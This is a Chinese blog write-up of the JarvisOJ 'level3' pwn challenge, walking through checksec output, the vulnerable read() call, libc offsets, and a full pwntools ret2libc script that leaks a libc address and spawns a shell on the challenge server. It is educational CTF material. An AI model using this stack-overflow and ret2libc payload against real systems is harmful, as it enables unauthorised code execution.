Writeup of level3(Pwn) in JarvisOJ

最新推荐文章于 2021-11-17 17:29:23 发布
最新推荐文章于 2021-11-17 17:29:23 发布
阅读量1.5k 收藏 3
点赞数
分类专栏: PWN_of_CTF 文章标签: CTF pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/cossack9989/article/details/79326659
版权

又拾起了被我搁在一边快一个月的Pwn……(这一个月我被Android逆向拐跑了?)

不扯了,看题。

0x00 checksec

拿到文件先查checksec,得到如下信息:

root@kali:~/Desktop/Pwn/level3# checksec level3
[*] '/root/Desktop/Pwn/level3/level3'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)

root@kali:~/Desktop/Pwn/level3# checksec libc-2.19.so
[*] '/root/Desktop/Pwn/level3/libc-2.19.so'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled

level3没有canary,可以利用栈溢出;栈不可执行(所以不考虑shellcode);没有开地址随机化;至于libc-2.19.so,必然是开了地址随机化;

0x01 exp logic

用IDA打开level3,看程序逻辑

int __cdecl main(int argc, const char **argv, const char **envp)
{
  vulnerable_function();
  write(1, "Hello, World!\n", 0xEu);
  return 0;
}
ssize_t vulnerable_function()
{
  char buf; // [sp+0h] [bp-88h]@1

  write(1, "Input:\n", 7u);
  return read(0, &buf, 0x100u);
}


进入main函数后先调用vulnerable_function,这里的关键是——调用了read。于是Step1应该是通过read构造栈溢出,栈溢出的目的是执行system("/bin/sh"),但是Alt+T搜了一番发现并没有相关函数与字符串,迷茫……

后来想起来学长说过在libc里面知道了read或者write就能推出system,仿佛有所领悟……

此处的elf和libc.so在elf运行时应当是同时加载到内存中,所以Step2应当是通过一系列操作获取某次运行时system和/bin/sh在内存中的绝对地址(至于这一系列操作……着实卡了我不少时间……后来幸亏找了某位巨佬的wp……才彻底理清思路)至于Step3……复写地址,入门套路。

  • Step1:通过vulnerable_function中的read构造栈溢出,并且覆写返回地址为plt中write的地址
  • Step2:通过write泄露出read在内存中的绝对地址,并且接着调用vulnerable_function(PS:got中的read保存着read在内存中的真实地址)
  • Step3:计算出system和/bin/sh的绝对地址,再通过vulnerable_function构造栈溢出进行覆写
  • Success

0x02 exp script

首先写脚本之前应做好准备工作,比如readelf把so文件中几个关键函数和字符串搜一遍 
root@kali:~/Desktop/Pwn/level3# readelf -a ./libc-2.19.so |grep "read@"
   571: 000daf60   125 FUNC    WEAK   DEFAULT   12 __read@@GLIBC_2.0
   705: 0006f220    50 FUNC    GLOBAL DEFAULT   12 _IO_file_read@@GLIBC_2.0
   950: 000daf60   125 FUNC    WEAK   DEFAULT   12 read@@GLIBC_2.0
  1166: 000e0c40  1461 FUNC    GLOBAL DEFAULT   12 fts_read@@GLIBC_2.0
  1263: 000ec390    46 FUNC    GLOBAL DEFAULT   12 eventfd_read@@GLIBC_2.7
  1698: 000643a0   259 FUNC    WEAK   DEFAULT   12 fread@@GLIBC_2.0
  2181: 000c3030   204 FUNC    WEAK   DEFAULT   12 pread@@GLIBC_2.1
  2300: 000643a0   259 FUNC    GLOBAL DEFAULT   12 _IO_fread@@GLIBC_2.0
root@kali:~/Desktop/Pwn/level3# readelf -a ./libc-2.19.so |grep "system@"
   620: 00040310    56 FUNC    GLOBAL DEFAULT   12 __libc_system@@GLIBC_PRIVATE
  1443: 00040310    56 FUNC    WEAK   DEFAULT   12 system@@GLIBC_2.0
root@kali:~/Desktop/Pwn/level3# readelf -a ./libc-2.19.so |grep "exit@"
   111: 00033690    58 FUNC    GLOBAL DEFAULT   12 __cxa_at_quick_exit@@GLIBC_2.10
   139: 00033260    45 FUNC    GLOBAL DEFAULT   12 exit@@GLIBC_2.0
   554: 000b5f24    24 FUNC    GLOBAL DEFAULT   12 _exit@@GLIBC_2.0
   609: 0011c2a0    56 FUNC    GLOBAL DEFAULT   12 svc_exit@@GLIBC_2.0
   645: 00033660    45 FUNC    GLOBAL DEFAULT   12 quick_exit@@GLIBC_2.10
   868: 00033490    84 FUNC    GLOBAL DEFAULT   12 __cxa_atexit@@GLIBC_2.1.3
  1037: 00126800    60 FUNC    GLOBAL DEFAULT   12 atexit@GLIBC_2.0
  1492: 000f9160    62 FUNC    GLOBAL DEFAULT   12 pthread_exit@@GLIBC_2.0
  2243: 00033290    77 FUNC    WEAK   DEFAULT   12 on_exit@@GLIBC_2.0
  2386: 000f9cd0     2 FUNC    GLOBAL DEFAULT   12 __cyg_profile_func_exit@@GLIBC_2.2
root@kali:~/Desktop/Pwn/level3# strings -a -t x ./libc-2.19.so | grep "/bin/sh"
 16084c /bin/sh
筛选之后得到 
   950: 000daf60   125 FUNC    WEAK   DEFAULT   12 read@@GLIBC_2.0
  1443: 00040310    56 FUNC    WEAK   DEFAULT   12 system@@GLIBC_2.0
   139: 00033260    45 FUNC    GLOBAL DEFAULT   12 exit@@GLIBC_2.0
 16084c /bin/sh
随后开始写exp 
from pwn import *
r=remote('pwn2.jarvisoj.com',9879)
e=ELF('./level3')

plt_write=hex(e.plt['write'])
got_read=hex(e.got['read'])
vulfuncadr=hex(e.symbols['vulnerable_function'])
plt_write_args=p32(0x01)+p32(int(got_read,16))+p32(0x04)
#调用顺序:func1_address+func2_adress+……+func1_argslist+func2_argslist+……
payload1='A'*(0x88+0x4)+p32(int(plt_write,16))+p32(int(vulfuncadr,16))+plt_write_args

r.recv()
r.send(payload1)
readadr=hex(u32(r.recv()))#泄露read绝对地址

#   950: 000daf60   125 FUNC    WEAK   DEFAULT   12 read@@GLIBC_2.0
#  1443: 00040310    56 FUNC    WEAK   DEFAULT   12 system@@GLIBC_2.0
#   139: 00033260    45 FUNC    GLOBAL DEFAULT   12 exit@@GLIBC_2.0
# 16084c /bin/sh

libc_read=0x000DAF60
offset=int(readadr,16)-libc_read #计算偏移量
sysadr=offset+0x00040310 #system绝对地址
xitadr=offset+0x00033260 #exit绝对地址
bshadr=offset+0x0016084C #binsh绝对地址
payload2='A'*(0x88+0x4)+p32(sysadr)+p32(xitadr)+p32(bshadr)

r.send(payload2)
r.interactive()

好,成功地把服务器pwn了下来23333,接下来求flag得flag,直接cat flag

0x03 Notes


C0ss4ck
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
Jarvis OJ--level3
Kni9hT's Blog
11-10 245
要点:通过read()的溢出构造rop链,获得write()函数的真实地址,再利用libc的偏移算出system和“/bin/sh”的地址,再次利用write()溢出,执行system,就能得到shell。 添加链接描述 flag: CTF{d85346df5770f56f69025bc3f5f1d3d0} ...
pwn溢出10道练习题有writeup
01-04
在这个场景中,"pwn溢出10道练习题有writeup" 提供了10个关于溢出的实战练习,每个题目都配有详细的解答,这对于学习和理解溢出漏洞原理及其利用技术非常有帮助。 溢出是由于程序在上分配的内存不足,...
Jarvis Oj Pwn 学习笔记-level3
baoan4763的博客
05-31 150
你们期待的Libc终于来了~(return_to_libc attack) 跪呈链接: https://files.cnblogs.com/files/Magpie/level3.rar nc pwn2.jarvisoj.com 9879 checksec,依旧老样子: 端起IDA,elf和libc双双扔进锅里: 先看elf: 阔以阔以,libc类题目该有的函数(话...
Jarvis OJ PWN level3
qq_43409582的博客
09-19 208
0x01 由于是本人第一次接触这种有关动态链接,plt和got表,延时绑定技术的题目所以这里就写的细一些。 我是看了很多大佬写的wp然后请教了下学长才明白的,真是煞费脑筋,决定一定要好好整理一下。 0x02 首先是需要了解一下got表和plt表的有关内容并对延迟绑定技术有一定理解。 GOT(Global Offset Table,全局偏移表)是Linux ELF文件中用于定位全局变量和函数的一个...
Jarvis OJ - pwn level3
hanqdi_的博客
02-03 225
前言 因为换了电脑,GitHub博客的环境搭起来太麻烦了,又想有所记录,所以又回到这里啦~ level3 前段时间做过pwn题目,现在再来做,发现以前很简单的脚本利用命令都忘记了,真是,啥东西都不能放,一放就忘,这脑子不管用了。 之后每天保持做题量,保持做题手感!在这里记录并且作为监督自己的一种方式。 做题思路 没有system和binsh,又给出了libc文件,容易想到可以用ret2libc方法...
Jarvis OJ level3 writeup
PLpa的博客
07-07 276
这题是典型的ROP返回libc地址题,是一个十分经典的ROP题目。 拿到题目我们可以看到他给出了一个rar文件,我们拿这个文件到Linux中解压一下: 解压出两个文件:level3和libc-2.19.so。 我们查看一下这两个文件的保护: 可以看到,libc-2.19.so保护全部开启了(幸好不是攻击他,哈哈),而level3只开了NX保护。 我们把level3放到IDA中查看一下程序逻辑:...
D3CTF2022-官方WriteUp1
08-03
"D3CTF2022-官方WriteUp1" 本文将对 D3CTF 2022 官方 WriteUp1 进行总结,主要涉及 MySQL UDF 提权、Java 反序列化、MySQLInject、Web 短链技术等多方面的知识点。 1. MySQL UDF 提权 在 MySQL 中,可以使用 User...
De1ctf 2020 -‘check in’ writeup
01-09
CTF(Capture The Flag)竞赛中,"De1ctf 2020 - ‘check in’" 是一道挑战性的安全题目,主要涉及到多个网络安全技术的综合运用,特别是与Web应用程序安全相关的方面。该题目的核心是通过理解并利用服务器配置中...
Codefest'2019 CTF writeup-b64_c3VuJTIwYm95.docx
11-29
Codefest'2019 CTF writeup 是一篇关于网络安全竞赛的总结,主要涉及的是在Codefest'19夺旗比赛中的几个挑战解决方案。CTF(Capture The Flag)是一种流行的安全竞赛,参赛者通过解决各种安全相关的谜题来获取“旗帜...
2020 蓝帽杯线下赛PWN WriteUp .pdf
09-05
本文主要涉及的是网络安全领域的Pwn(利用漏洞攻防)技术,具体是针对2020年蓝帽杯线下赛中的一个Pwn题目进行的WriteUp(解题报告)。Pwn类题目通常涉及到缓冲区溢出、格式字符串漏洞、整数溢出等,目标是通过编写...
Jarvis OJ-PWN-[XMAN]level3 wp
分不清东西南北的Laffey
10-15 697
地址:nc pwn2.jarvisoj.com 9879 一开始拿到题目的时候是一个rar文件 解压后就得到了两个文件 对这两个文件查看保护 两个文件都是32位的 level3没有开启保护 可以利用溢出;中内容不可使用 不用shellcode libc-2.19.so可以看到是全部都开启了 用IDA32打开level3 跟进vulnerable_function()函数 溢出点在r...
Jarvis OJ [XMAN]level3 [XMAN]level3
九层台
07-07 1443
查询保护 liu@liu-F117-F:~/桌面/oj/level3$ checksec level3 [*] '/home/liu/\xe6\xa1\x8c\xe9\x9d\xa2/oj/level3/level3' Arch: i386-32-little RELRO: Partial RELRO Stack: No canary found ...
Jarvis oj level3
发蝴蝶和大脑斧的博客
12-04 1114
下载下来发现有level3文件和libc.so文件,先checksec,和level2差不多,接着ida打开level3,没找到system函数和bin字符串,没什么办法了。接着去看so文件,libc是Linux下的ANSI C的函数库。找到了system函数和bin字符串。那么怎么利用呢? 首先了解plt和got表。链接 我是这么理解的:plt表中存放的是函数在got表中该项的地址,got表存放...
Jarvis OJ-level3
weixin_30332241的博客
05-15 94
使用ret2libc攻击方法绕过数据执行保护 from pwn import* conn = remote("pwn2.jarvisoj.com",9879) elf = ELF('level3') libc = ELF('libc-2.19.so') plt_write = elf.symbols['write'] #0804834 print 'plt_write =...
jarvis oj level3
CNXBDSa的博客
07-27 392
首先先了解一下libc库的知识详情请移步大佬总结 了解一下plt和got表详情请移步大佬总结 然后是做题过程首先老规矩在ubuntu中checksec+文件名查看有无什么保护机制和位数 Arch:说明这个文件的属性是什么,说明是32位的程序。 Stack:canary,这个主要是说保护的东西,所利用的东西就是相当于网站的cookie,linux中把这种cookie信息称为cana...
攻防世界-level3-Writeup
SkYe's Blog
05-15 497
level3 [collapse title=“展开查看详情” status=“false”] 考点:溢出、ROP(ret2libc) ssize_t vulnerable_function() { char buf; // [esp+0h] [ebp-88h] write(1, "Input:\n", 7u); return read(0, &buf, 0x100u); //溢出 } 打开了 NX 保护数据不可执行,程序没有预留后门。解决办法就是 ret2libc ,这
jarvisoj_level3
m0_52231248的博客
11-17 651
jarvisoj_level3 Checksec: Ida: 标准的ret2libc,offest=0x88+4 有write和read的plt地址 Exp: from pwn import* from LibcSearcher import* r=remote("node4.buuoj.cn",26088) elf=ELF('./level3') context.log_level = 'debug' payload=flat('a'*0x88+'bbbb') payload+=
pwn level3
weixin_45677731的博客
03-15 524
解压之后有一个level3和libc_32.so.6,拖进ida(32位) 主要就是这两个函数,一个write和一个read 这道题的基本思路就是通过第一次溢出将write函数在got表中的地址泄露,然后减去在libc_32.so.6中的偏移,得到基地址,在加上ibc_32.so.6中找到的system和"/bin/sh"偏移得到真实的地址,然后再执行一次main函数进行第二次溢出 对于writ...
CTF-PWN-level3(Jarvis OJ)
SuperGate的博客
02-15 465
发现这个系列的题构造都差不多……不过不同的是这道题中没有给出system的地址。 checksec一下发现cannary没开,于是分析read函数,发现可以溢出。 基本思路就是先利用第二个write函数打印出write函数的got表地址。然后再在给出的libc库中找到write函数的地址,计算偏移值offset。再从libc库中找到system,/bin/sh的地址,通过offset和溢出...
HFCTF2022线上赛官方Writeup:WEB、CRYPTO与PWN挑战解析
"HFCTF2022线上赛官方Writeup1主要涵盖了多个网络安全和编程挑战,包括WEB、CRYPTO、PWN、REVERSE和MISC等类别。其中,题目涉及了RSA加密、MD5哈希、zlib压缩、SSRF漏洞利用、元数据解析、动态链接器预加载(ld_...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值